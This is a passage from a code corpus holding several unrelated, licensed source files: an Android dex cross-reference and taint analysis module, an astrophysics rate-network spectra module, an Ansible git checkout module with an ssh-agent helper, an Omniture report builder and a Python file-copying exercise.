from sign import Signature
class StringAnalysis(object):
def __init__(self, value):
self.value = value
self.xreffrom = set()
def AddXrefFrom(self, classobj, methodobj):
#debug("Added strings xreffrom for %s to %s" % (self.value, methodobj))
self.xreffrom.add((classobj, methodobj))
def get_xref_from(self):
return self.xreffrom
def __str__(self):
data = "XREFto for string %s in\n" % repr(self.value)
for ref_class, ref_method in self.xreffrom:
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
return data
class MethodClassAnalysis(object):
def __init__(self, method):
self.method = method
self.xrefto = set()
self.xreffrom = set()
def AddXrefTo(self, classobj, methodobj):
#debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefto.add((classobj, methodobj))
def AddXrefFrom(self, classobj, methodobj):
#debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xreffrom.add((classobj, methodobj))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def __str__(self):
data = "XREFto for %s\n" % self.method
for ref_class, ref_method in self.xrefto:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
data += "XREFFrom for %s\n" % self.method
for ref_class, ref_method in self.xreffrom:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
return data
class FieldClassAnalysis(object):
def __init__(self, field):
self.field = field
self.xrefread = set()
self.xrefwrite = set()
def AddXrefRead(self, classobj, methodobj):
#debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefread.add((classobj, methodobj))
def AddXrefWrite(self, classobj, methodobj):
#debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefwrite.add((classobj, methodobj))
def get_xref_read(self):
return self.xrefread
def get_xref_write(self):
return self.xrefwrite
def __str__(self):
data = "XREFRead for %s\n" % self.field
for ref_class, ref_method in self.xrefread:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
data += "XREFWrite for %s\n" % self.field
for ref_class, ref_method in self.xrefwrite:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
return data
REF_NEW_INSTANCE = 0
REF_CLASS_USAGE = 1
class ClassAnalysis(object):
def __init__(self, classobj):
self._class = classobj
self._methods = {}
self._fields = {}
self.xrefto = collections.defaultdict(set)
self.xreffrom = collections.defaultdict(set)
def get_method_analysis(self, method):
return self._methods.get(method)
def get_field_analysis(self, field):
return self._fields.get(field)
def AddFXrefRead(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefRead(classobj, method)
def AddFXrefWrite(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefWrite(classobj, method)
def AddMXrefTo(self, method1, classobj, method2):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefTo(classobj, method2)
def AddMXrefFrom(self, method1, classobj, method2):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefFrom(classobj, method2)
def AddXrefTo(self, ref_kind, classobj, methodobj):
#debug("Added class xrefto for %s to %s" % (self._class.get_name(), classobj.get_vm_class().get_name()))
self.xrefto[classobj].add((ref_kind, methodobj))
def AddXrefFrom(self, ref_kind, classobj, methodobj):
#debug("Added class xreffrom for %s to %s" % (self._class.get_name(), classobj.get_vm_class().get_name()))
self.xreffrom[classobj].add((ref_kind, methodobj))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def get_vm_class(self):
return self._class
def __str__(self):
data = "XREFto for %s\n" % self._class
for ref_class in self.xrefto:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method in self.xrefto[ref_class]:
data += "%d %s\n" % (ref_kind, ref_method)
data += "\n"
data += "XREFFrom for %s\n" % self._class
for ref_class in self.xreffrom:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method in self.xreffrom[ref_class]:
data += "%d %s\n" % (ref_kind, ref_method)
data += "\n"
return data
class newVMAnalysis(object):
def __init__(self, vm):
self.vm = vm
self.classes = {}
self.strings = {}
for current_class in self.vm.get_classes():
self.classes[current_class.get_name()] = ClassAnalysis(current_class)
def create_xref(self):
debug("Creating XREF/DREF")
instances_class_name = self.classes.keys()
external_instances = {}
for current_class in self.vm.get_classes():
for current_method in current_class.get_methods():
debug("Creating XREF for %s" % current_method)
code = current_method.get_code()
if code == None:
continue
off = 0
bc = code.get_bc()
for instruction in bc.get_instructions():
op_value = instruction.get_op_value()
if op_value in [0x1c, 0x22]:
idx_type = instruction.get_ref_kind()
type_info = self.vm.get_cm_type(idx_type)
# Internal xref related to class manipulation
if type_info in instances_class_name and type_info != current_class.get_name():
# new instance
if op_value == 0x22:
self.classes[current_class.get_name()].AddXrefTo(REF_NEW_INSTANCE, self.classes[type_info], current_method)
self.classes[type_info].AddXrefFrom(REF_NEW_INSTANCE, self.classes[current_class.get_name()], current_method)
# class reference
else:
self.classes[current_class.get_name()].AddXrefTo(REF_CLASS_USAGE, self.classes[type_info], current_method)
self.classes[type_info].AddXrefFrom(REF_CLASS_USAGE, self.classes[current_class.get_name()], current_method)
elif ((op_value >= 0x6e and op_value <= 0x72) or
(op_value >= 0x74 and op_value <= 0x78)):
idx_meth = instruction.get_ref_kind()
method_info = self.vm.get_cm_method(idx_meth)
if method_info:
class_info = method_info[0]
method_item = self.vm.get_method_descriptor(method_info[0], method_info[1], ''.join(method_info[2]))
if method_item:
self.classes[current_class.get_name()].AddMXrefTo(current_method, self.classes[class_info], method_item)
self.classes[class_info].AddMXrefFrom(method_item, self.classes[current_class.get_name()], current_method)
# Internal xref related to class manipulation
if class_info in instances_class_name and class_info != current_class.get_name():
self.classes[current_class.get_name()].AddXrefTo(REF_CLASS_USAGE, self.classes[class_info], method_item)
self.classes[class_info].AddXrefFrom(REF_CLASS_USAGE, self.classes[current_class.get_name()], current_method)
elif op_value >= 0x1a and op_value <= 0x1b:
string_value = self.vm.get_cm_string(instruction.get_ref_kind())
if string_value not in self.strings:
self.strings[string_value] = StringAnalysis(string_value)
self.strings[string_value].AddXrefFrom(self.classes[current_class.get_name()], current_method)
elif op_value >= 0x52 and op_value <= 0x6d:
idx_field = instruction.get_ref_kind()
field_info = self.vm.get_cm_field(idx_field)
field_item = self.vm.get_field_descriptor(field_info[0], field_info[2], field_info[1])
if field_item:
# read access to a field
if (op_value >= 0x52 and op_value <= 0x58) or (op_value >= 0x60 and op_value <= 0x66):
self.classes[current_class.get_name()].AddFXrefRead(current_method, self.classes[current_class.get_name()], field_item)
# write access to a field
else:
self.classes[current_class.get_name()].AddFXrefWrite(current_method, self.classes[current_class.get_name()], field_item)
off += instruction.get_length()
def get_method(self, method):
return MethodAnalysis( self.vm, method, None )
def get_method_by_name(self, class_name, method_name, method_descriptor):
print class_name, method_name, method_descriptor
if class_name in self.classes:
for method in self.classes[class_name].get_vm_class().get_methods():
print method.get_name(), method.get_descriptor()
if method.get_name() == method_name and method.get_descriptor() == method_descriptor:
return method
return None
def is_class_present(self, class_name):
return class_name in self.classes
def get_class_analysis(self, class_name):
return self.classes.get(class_name)
def get_strings_analysis(self):
return self.strings
class VMAnalysis(object):
"""
This class analyses a dex file
:param _vm: the object which represent the dex file
:type _vm: a :class:`DalvikVMFormat` object
:Example:
VMAnalysis( DalvikVMFormat( read("toto.dex", binary=False) ) )
"""
def __init__(self, vm):
self.vm = vm
self.tainted_variables = TaintedVariables( self.vm )
self.tainted_packages = TaintedPackages( self.vm )
self.tainted = { "variables" : self.tainted_variables,
"packages" : self.tainted_packages,
}
self.signature = None
for i in self.vm.get_all_fields():
self.tainted_variables.add( [ i.get_class_name(), i.get_descriptor(), i.get_name() ], TAINTED_FIELD )
self.methods = []
self.hmethods = {}
self.__nmethods = {}
for i in self.vm.get_methods():
x = MethodAnalysis( self.vm, i, self )
self.methods.append( x )
self.hmethods[ i ] = x
self.__nmethods[ i.get_name() ] = x
def get_vm(self):
return self.vm
def get_method(self, method):
"""
Return an analysis method
:param method: a classical method object
:type method: an :class:`EncodedMethod` object
:rtype: a :class:`MethodAnalysis` object
"""
return self.hmethods[ method ]
def get_methods(self):
"""
Return each analysis method
:rtype: a :class:`MethodAnalysis` object
"""
for i in self.hmethods:
yield self.hmethods[i]
def get_method_signature(self, method, grammar_type="", options={}, predef_sign=""):
"""
Return a specific signature for a specific method
:param method: a reference to method from a vm class
:type method: a :class:`EncodedMethod` object
:param grammar_type: the type of the signature (optional)
:type grammar_type: string
:param options: the options of the signature (optional)
:param options: dict
:param predef_sign: used a predefined signature (optional)
:type predef_sign: string
:rtype: a :class:`Sign` object
"""
if self.signature == None:
self.signature = Signature( self )
if predef_sign != "":
g = ""
o = {}
for i in predef_sign.split(":"):
if "_" in i:
g += "L0:"
o[ "L0" ] = SIGNATURES[ i ]
else:
g += i
g += ":"
return self.signature.get_method( self.get_method( method ), g[:-1], o )
else:
return self.signature.get_method( self.get_method( method ), grammar_type, options )
def get_permissions(self, permissions_needed):
"""
Return the permissions used
:param permissions_needed: a list of restricted permissions to get ([] returns all permissions)
:type permissions_needed: list
:rtype: a dictionnary of permissions paths
"""
permissions = {}
permissions.update( self.get_tainted_packages().get_permissions( permissions_needed ) )
permissions.update( self.get_tainted_variables().get_permissions( permissions_needed ) )
return permissions
def get_permissions_method(self, method):
permissions_f = self.get_tainted_packages().get_permissions_method( method )
permissions_v = self.get_tainted_variables().get_permissions_method( method )
all_permissions_of_method = permissions_f.union(permissions_v)
return list(all_permissions_of_method)
def get_tainted_variables(self):
"""
Return the tainted variables
:rtype: a :class:`TaintedVariables` object
"""
return self.tainted_variables
def get_tainted_packages(self):
"""
Return the tainted packages
:rtype: a :class:`TaintedPackages` object
"""
return self.tainted_packages
def get_tainted_fields(self):
return self.get_tainted_variables().get_fields()
def get_tainted_field(self, class_name, name, descriptor):
"""
Return a specific tainted field
:param class_name: the name of the class
:param name: the name of the field
:param descriptor: the descriptor of the field
:type class_name: string
:type name: string
:type descriptor: string
:rtype: a :class:`TaintedVariable` object
"""
return self.get_tainted_variables().get_field( class_name, name, descriptor )
class uVMAnalysis(VMAnalysis):
"""
This class analyses a dex file but on the fly (quicker !)
:param _vm: the object which represent the dex file
:type _vm: a :class:`DalvikVMFormat` object
:Example:
uVMAnalysis( DalvikVMFormat( read("toto.dex", binary=False) ) )
"""
def __init__(self, vm):
self.vm = vm
self.tainted_variables = TaintedVariables( self.vm )
self.tainted_packages = TaintedPackages( self.vm )
self.tainted = { "variables" : self.tainted_variables,
"packages" : self.tainted_packages,
}
self.signature = None
self.resolve = False
def get_methods(self):
self.resolve = True
for i in self.vm.get_methods():
yield MethodAnalysis(self.vm, i, self)
def get_method(self, method):
return MethodAnalysis( self.vm, method, None )
def get_vm(self):
return self.vm
def _resolve(self):
if self.resolve == False:
for i in self.get_methods():
pass
def get_tainted_packages(self):
self._resolve()
return self.tainted_packages
def get_tainted_variables(self):
self._resolve()
return self.tainted_variables
def is_ascii_obfuscation(vm):
for classe in vm.get_classes():
if is_ascii_problem(classe.get_name()):
return True
for method in classe.get_methods():
if is_ascii_problem(method.get_name()):
return True
return False
| apache-2.0 | -7,692,190,307,748,464,000 | 33.142098 | 169 | 0.524759 | false | 3.785638 | false | false | false |
sbird/fake_spectra | fake_spectra/ratenetworkspectra.py | 1 | 6626 | """Modified versions of gas properties and spectra that use the rate network."""
import numpy as np
from ._spectra_priv import _interpolate_2d
from . import gas_properties
from . import spectra
from .rate_network import RateNetwork
class RateNetworkGas(gas_properties.GasProperties):
"""Replace the get_reproc_HI function with something that solves the rate network. Optionally can also do self-shielding."""
def __init__(self, redshift, absnap, hubble=0.71, fbar=0.17, units=None, sf_neutral=True, temp_factor=1, gamma_factor=1, **kwargs):
super().__init__(redshift, absnap, hubble=hubble, fbar=fbar, units=units, sf_neutral=sf_neutral)
self.rates = RateNetwork(redshift, f_bar = fbar, **kwargs)
self.temp_factor = temp_factor
self.gamma_factor = gamma_factor
self.maxdens = self.PhysDensThresh/0.76
dmax = 5
dsz=1000
if self.sf_neutral:
dmax = np.log(self.maxdens)
dsz = 500
self.build_interp(dlim=(-16, dmax), elim=(2, 21),tsz=500, dsz=dsz)
def build_interp(self, dlim, elim, tsz=500, dsz=1000):
"""Build the interpolator"""
#Build interpolation
self.densgrid = np.linspace(dlim[0], dlim[1], dsz)
self.ienergygrid = np.linspace(elim[0], elim[1], tsz)
dgrid, egrid = np.meshgrid(self.densgrid, self.ienergygrid)
self.lh0grid = np.zeros_like(dgrid)
self.tempgrid = np.zeros_like(dgrid)
#We assume primordial helium
for i in range(dsz):
self.lh0grid[:,i] = np.log(self.rates.get_neutral_fraction(np.exp(dgrid[:,i]), np.exp(egrid[:,i])))
self.tempgrid[:,i] = np.log(self.rates.get_temp(np.exp(dgrid[:,i]), np.exp(egrid[:,i])))
def get_temp(self,part_type, segment):
"""Compute temperature (in K) from internal energy using the rate network."""
temp, ii2, density, ienergy = self._get_interp(part_type, segment, nhi=False)
if np.size(ii2) > 0:
temp[ii2] = self.rates.get_temp(density[ii2], ienergy[ii2])
assert np.all(np.logical_not(np.isnan(temp)))
return temp
def _get_interp(self, part_type, segment, nhi=True):
"""Get a neutral hydrogen fraction using a rate network which reads temperature and density of the gas."""
#expecting units of atoms/cm^3
density = self.get_code_rhoH(part_type, segment)
#expecting units of 10^-10 ergs/g
ienergy = self.absnap.get_data(part_type, "InternalEnergy", segment=segment)*self.units.UnitInternalEnergy_in_cgs/1e10
ienergy = self._get_ienergy_rescaled(density, ienergy)
ldensity = np.log(density)
lienergy = np.log(ienergy)
#Clamp the temperatures : hot gas has the same neutral fraction of 0 anyway.
ie = np.where(lienergy >= np.max(self.ienergygrid))
lienergy[ie] = np.max(self.ienergygrid)*0.99
ie = np.where(lienergy <= np.min(self.ienergygrid))
lienergy[ie] = np.min(self.ienergygrid)*1.01
out = np.ones_like(density)
ii = np.where(ldensity < np.max(self.densgrid))
if (np.max(self.ienergygrid) < np.max(lienergy[ii])) or (np.min(self.ienergygrid) > np.min(lienergy[ii])):
raise ValueError("Ienergy out of range: interp %g -> %g. Present: %g -> %g" % (np.min(self.ienergygrid), np.max(self.ienergygrid), np.min(lienergy[ii]), np.max(lienergy[ii])))
#Correct internal energy to the internal energy of a cold cloud if we are on the star forming equation of state.
if nhi:
zgrid = self.lh0grid
else:
zgrid = self.tempgrid
out[ii] = np.exp(_interpolate_2d(ldensity[ii], lienergy[ii], self.densgrid, self.ienergygrid, zgrid))
ii2 = np.where(ldensity >= np.max(self.densgrid))
return out,ii2,density,ienergy
def get_reproc_HI(self, part_type, segment):
"""Get a neutral hydrogen fraction using a rate network which reads temperature and density of the gas."""
#expecting units of atoms/cm^3
nH0, ii2, density, ienergy = self._get_interp(part_type, segment, nhi=True)
if np.size(ii2) > 0:
if self.sf_neutral:
if self.redshift_coverage:
ssnH0 = self._neutral_fraction(density[ii2], 1e4)
nH0[ii2] = ssnH0
else:
nH0[ii2] = 1.
else:
nH0[ii2] = self.rates.get_neutral_fraction(density[ii2], ienergy[ii2])
assert np.all(np.logical_not(np.isnan(nH0)))
return nH0
def _get_ienergy_rescaled(self, density, ienergy):
"""Get the internal energy, rescaled to give the desired equation of state.
Technically the e. of s. normally used is:
T = T_0 (rho / rho_0)^(gamma-1)
However in photoionisation equilibrium the electron density depends very weakly
on the temperature, and so T/T_0 = U/U_0
So we can just rescale the internal energy:
when T_0 -> T_0' U -> U * T_0'/T_0.
Ditto for gamma, when gamma -> gamma' we have:
U -> U (rho/rho_0) ^(gamma'-gamma)
Note this means that if any particle lies off the original equation of state,
it lies off the new one by a similar amount; the dispersion is preserved!
"""
#Adjust temperature by desired factor, to give desired equation of state.
omegab = 0.0445
rhoc = self.units.rho_crit(self.hubble) * (1+self.redshift)**3
overden = self.units.protonmass * density /(omegab * rhoc)
ienergy *= self.temp_factor
#Adjust slope by same factor: note use gamma_factor -1 so gamma_factor = 1 means no change.
if self.gamma_factor != 1.:
ienergy *= (overden)**(self.gamma_factor-1.)
assert np.all(np.logical_not(np.isnan(ienergy)))
assert np.all(ienergy > 0)
return ienergy
class RateNetworkSpectra(spectra.Spectra):
"""Generate spectra with a neutral fraction from a rate network"""
def __init__(self, *args, photo_factor = 1, sf_neutral=True,
selfshield=True, temp_factor = 1, gamma_factor = 1,
hubble = 0.71, fbar = 0.17,
treecool_file = "data/TREECOOL_ep_2018p", **kwargs):
kwargs["gasprop"]=RateNetworkGas
kwargs["sf_neutral"] = sf_neutral
kwargs["gasprop_args"] = {"photo_factor" : photo_factor,
"selfshield" : selfshield, "temp_factor" : temp_factor,
"gamma_factor" : gamma_factor, "hubble" : hubble,
"fbar" : fbar, "treecool_file" : treecool_file}
super().__init__(*args, **kwargs)
| mit | -4,436,049,052,491,339,000 | 49.969231 | 187 | 0.623453 | false | 3.270484 | false | false | false |
drewandersonnz/openshift-tools | ansible/roles/lib_git/library/git_checkout.py | 12 | 13883 | #!/usr/bin/env python
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
"""Run an ssh agent and set SSH_AUTH_SOCK so that clients will use it
Example:
with ssh_agent.SshAgent() as agent:
agent.add_key(private_key_string)
# do ssh stuff
# as agent loses scope, the ssh agent is killed
"""
from __future__ import with_statement
import atexit
import tempfile
import os
import sys
import shutil
import subprocess
import random
import time
import datetime
class SshAgentException(Exception):
"""An exception thrown for problems in SshAgent
"""
def __init__(self, message):
# Call the base class constructor with the parameters it needs
super(SshAgentException, self).__init__(message)
class SshAgent(object):
"""Run an ssh agent and set SSH_AUTH_SOCK so that clients will use it.
The running agent can have one or more keys added (via the SshAgent.add_key()
method or via any other method that can find and talk to the running agent.
"""
class Cleanup(object):
"""A helper functor class for SshAgent
An object of this class can be passed
directly to atexit, which will call __call__() when the
program exits
"""
def __init__(self, ssh_agent, ssh_auth_sock_dir):
self.ssh_agent = ssh_agent
self.ssh_auth_sock_dir = ssh_auth_sock_dir
self.cleaned_up = False
self.original_env_var = os.environ.get('SSH_AUTH_SOCK')
def __call__(self):
if self.cleaned_up:
return
self.cleaned_up = True
try:
shutil.rmtree(self.ssh_auth_sock_dir, ignore_errors=True)
except OSError:
pass
try:
self.ssh_agent.kill()
except OSError:
pass
if self.original_env_var:
os.environ['SSH_AUTH_SOCK'] = self.original_env_var
else:
del os.environ['SSH_AUTH_SOCK']
def pass_(self):
"""A function to appease pylint"""
pass
def pass__(self):
"""Another function to appease pylint"""
self.pass_()
def __init__(self):
devnull = open(os.devnull, 'w')
# Start an ssh-agent process and register it to be killed atexit
self.ssh_auth_sock_dir = tempfile.mkdtemp(prefix=os.path.basename(sys.argv[0]) + '.')
self.ssh_auth_sock = os.path.join(self.ssh_auth_sock_dir, "ssh_agent")
self.ssh_agent = subprocess.Popen(["ssh-agent", "-d", "-a", self.ssh_auth_sock], stdout=devnull, stderr=devnull)
self.cleanup = self.Cleanup(self.ssh_agent, self.ssh_auth_sock_dir)
# this is here so that when python exits, we make sure that the agent is killed
# (in case python exits before our __del__() is called
atexit.register(self.cleanup)
os.environ["SSH_AUTH_SOCK"] = self.ssh_auth_sock
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tback):
self.cleanup()
def __del__(self):
self.cleanup()
def kill(self):
'''Explicitly kill the running ssh-agent
It's not necessary to call this function as the agent
will be cleaned up automatically.
'''
self.cleanup()
def add_key(self, key):
"""Add a key to the running agent.
Note:
This function can be called any number of times to add multiple keys.
Args:
key (str): A string containing the ssh private key to be added (the
actual key data, not the filename of a key)
Raises:
SshAgentException: when ssh-add does not immediately return (as in the
case of a private key with a passphrase)
"""
#if self.ssh_agent.poll() is None:
# raise SshAgentException("Unable to add ssh key. Did agent die?")
named_pipe_path = os.path.join(self.ssh_auth_sock_dir, "keypipe." + str(random.getrandbits(64)))
try:
os.mkfifo(named_pipe_path, 0600)
except OSError, exception:
print "Failed to create FIFO: %s" % exception
devnull = open(os.devnull, 'w')
ssh_add = subprocess.Popen(["ssh-add", named_pipe_path], stdout=devnull, stderr=devnull)
fifo = open(named_pipe_path, 'w')
print >> fifo, key
fifo.close()
#Popen.wait() doesn't have a timeout, so we'll implement one using poll() :(
start_time = datetime.datetime.now()
while ssh_add.poll() is None:
if (datetime.datetime.now() - start_time).total_seconds() > 5:
try:
ssh_add.kill()
except OSError:
pass
raise SshAgentException("Unable to add ssh key. Timed out. Does key have a passphrase?")
time.sleep(0.1)
os.remove(named_pipe_path)
# pylint: disable=too-many-lines
# these are already imported inside of the ssh library
#import os
#import subprocess
class GitCLIError(Exception):
'''Exception class for openshiftcli'''
pass
# pylint: disable=too-few-public-methods
class GitCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
path,
verbose=False,
ssh_key=None,
author=None):
''' Constructor for GitCLI '''
self.path = path
self.verbose = verbose
self.ssh_key = ssh_key
self.author = author
self.environment_vars = os.environ.copy()
if self.author:
author_dict = {}
author_list = author.split('<')
author_dict['GIT_COMMITTER_NAME'] = author_list[0].strip()
author_dict['GIT_COMMITTER_EMAIL'] = author_list[0].strip()
self.environment_vars.update(author_dict)
def _add(self, files_to_add=None):
''' git add '''
cmd = ["add", "--no-ignore-removal"]
if files_to_add:
cmd.extend(files_to_add)
else:
cmd.append('.')
results = self.git_cmd(cmd)
return results
def _commit(self, msg, author=None):
''' git commit with message '''
cmd = ["commit", "-m", msg]
if author:
cmd += ["--author", author]
results = self.git_cmd(cmd)
return results
def _clone(self, repo, dest, bare=False):
''' git clone '''
cmd = ["clone"]
if bare:
cmd += ["--bare"]
cmd += [repo, dest]
results = self.git_cmd(cmd)
return results
def _fetch(self, remote):
''' git fetch '''
cmd = ["fetch"]
cmd += [remote]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _status(self, porcelain=False, show_untracked=True):
''' Do a git status '''
cmd = ["status"]
if porcelain:
cmd.append('--porcelain')
if show_untracked:
cmd.append('--untracked-files=normal')
else:
cmd.append('--untracked-files=no')
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _checkout(self, branch):
''' Do a git checkout to <branch> '''
cmd = ["checkout", branch]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _get_current_branch(self):
''' Do a git checkout to <branch> '''
cmd = ["describe", "--contains", "--all", "HEAD"]
results = self.git_cmd(cmd, output=True, output_type='raw')
results['results'] = results['results'].rstrip()
return results
def _merge(self, merge_id):
''' Do a git checkout to <branch> '''
cmd = ["merge", merge_id]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _push(self, remote, src_branch, dest_branch):
''' Do a git checkout to <branch> '''
push_branches = src_branch + ":" + dest_branch
cmd = ["push", remote, push_branches]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _remote_update(self):
''' Do a git remote update '''
cmd = ["remote", "update"]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _diff(self, diff_branch):
''' Do a git diff diff_branch'''
cmd = ["diff", diff_branch]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _rebase(self, rebase_branch):
''' Do a git rebase rebase_branch'''
cmd = ["rebase", rebase_branch]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _config(self, get_args):
''' Do a git config --get <get_args> '''
cmd = ["config", '--get', get_args]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def git_cmd(self, cmd, output=False, output_type='json'):
'''Base command for git '''
cmds = ['/usr/bin/git']
cmds.extend(cmd)
rval = {}
results = ''
err = None
if self.verbose:
print ' '.join(cmds)
if self.ssh_key:
with SshAgent() as agent:
self.environment_vars['SSH_AUTH_SOCK'] = os.environ['SSH_AUTH_SOCK']
agent.add_key(self.ssh_key)
proc = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self.environment_vars)
stdout, stderr = proc.communicate()
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
else:
proc = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self.environment_vars)
stdout, stderr = proc.communicate()
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
if proc.returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.message:
err = err.message
elif output_type == 'raw':
rval['results'] = stdout
if self.verbose:
print stdout
print stderr
if err:
rval.update({"err": err,
"cmd": cmds
})
else:
rval.update({"results": {}})
# Always include stdout/stderr:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class GitCheckout(GitCLI):
''' Class to wrap the git checkout command line tools
'''
# pylint: disable=too-many-arguments
def __init__(self,
path,
branch):
''' Constructor for GitCheckout '''
super(GitCheckout, self).__init__(path)
self.path = path
self.branch = branch
self.debug = []
os.chdir(path)
def checkout(self):
'''perform a git checkout '''
current_branch_results = self._get_current_branch()
if current_branch_results['results'] == self.branch:
current_branch_results['checkout_not_needed'] = True
return current_branch_results
rval = {}
rval['branch_results'] = current_branch_results
checkout_results = self._checkout(self.branch)
rval['checkout_results'] = checkout_results
rval['returncode'] = checkout_results['returncode']
return rval
def main():
'''
ansible git module for checkout
'''
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', type='str', choices=['present']),
path=dict(default=None, required=True, type='str'),
branch=dict(default=None, required=True, type='str'),
),
supports_check_mode=False,
)
git = GitCheckout(module.params['path'],
module.params['branch'])
state = module.params['state']
if state == 'present':
results = git.checkout()
if results['returncode'] != 0:
module.fail_json(msg=results)
if results.has_key('checkout_not_needed'):
module.exit_json(changed=False, results=results, state="present")
module.exit_json(changed=True, results=results, state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
if __name__ == '__main__':
from ansible.module_utils.basic import *
main()
| apache-2.0 | 8,853,674,202,672,386,000 | 30.058166 | 120 | 0.526759 | false | 4.072455 | false | false | false |
DeStars/omniture_python | omniture_python/report_definition.py | 1 | 2519 | from datetime import datetime
__author__ = 'DeStars'
class ReportBuilder:
def __init__(self):
self.data = {}
@classmethod
def _elements(cls):
return ("_suite_id", "_start_date", "_end_date",
"_date_granularity", "_metrics_id", "_elements")
@staticmethod
def _convert_to_int(int_str):
return int(int_str)
@staticmethod
def _convert_to_date(date_str):
return datetime.strptime(date_str, '%Y-%m-%d').strftime("%Y-%m-%d")
def _copy(self):
obj = ReportBuilder()
for val in ReportBuilder._elements():
if val in self.data:
obj.data[val] = self.data[val]
return obj
def with_report_suite_id(self, suite_id):
obj = self._copy()
obj.data["_suite_id"] = suite_id
return obj
def with_dates(self, start_date, end_date):
obj = self._with_start_date(start_date)._with_end_date(end_date)
return obj
def _with_start_date(self, date):
obj = self._copy()
obj.data["_start_date"] = self._convert_to_date(date)
return obj
def _with_end_date(self, date):
obj = self._copy()
obj.data["_end_date"] = self._convert_to_date(date)
return obj
def with_date_granularity(self, granularity):
obj = self._copy()
obj.data["_date_granularity"] = granularity
return obj
def add_metrics(self, metrics_id):
obj = self._copy()
if "_metrics_id" not in obj.data:
obj.data["_metrics_id"] = []
obj.data["_metrics_id"].extend(metrics_id)
return obj
def add_elements(self, element_id, num_values):
obj = self._copy()
if "_elements" not in obj.data:
obj.data["_elements"] = []
obj.data["_elements"].append([element_id, str(num_values)])
return obj
def get_report_definition(self):
# check all required elements are available
# return object
metrics = [{"id": mid} for mid in self.data["_metrics_id"]]
elements = [{"id": eid, "top": top} for eid, top in self.data["_elements"]]
return {
"reportDescription":{
"reportSuiteID": self.data["_suite_id"],
"dateFrom": self.data["_start_date"],
"dateTo": self.data["_end_date"],
"dateGranularity": self.data["_date_granularity"],
"metrics": metrics,
"elements": elements
}
}
| mit | 6,300,023,046,565,561,000 | 29.719512 | 83 | 0.543867 | false | 3.765321 | false | false | false |
Karunesh/google_python_exercises | copyspecial/copyspecial.py | 1 | 1730 | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import commands
"""Copy Special exercise
"""
def get_special_paths(dir_path):
if not dir_path.endswith('/'):
dir_path = dir_path + '/'
files_and_dirs = os.listdir(dir_path)
special_paths = []
for _name in files_and_dirs:
is_special = re.search(r'__\w+__', _name)
if is_special:
special_paths.append(dir_path + _name)
return special_paths
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
special_paths = get_special_paths(args[0])
for special_path in special_paths:
if todir: # empty strings return False
if not os.path.exists(todir):
os.makedirs(todir)
shutil.copy(special_path, todir)
elif tozip:
print 'case tozip yet to be implemented'
else:
print special_path
if __name__ == "__main__":
main()
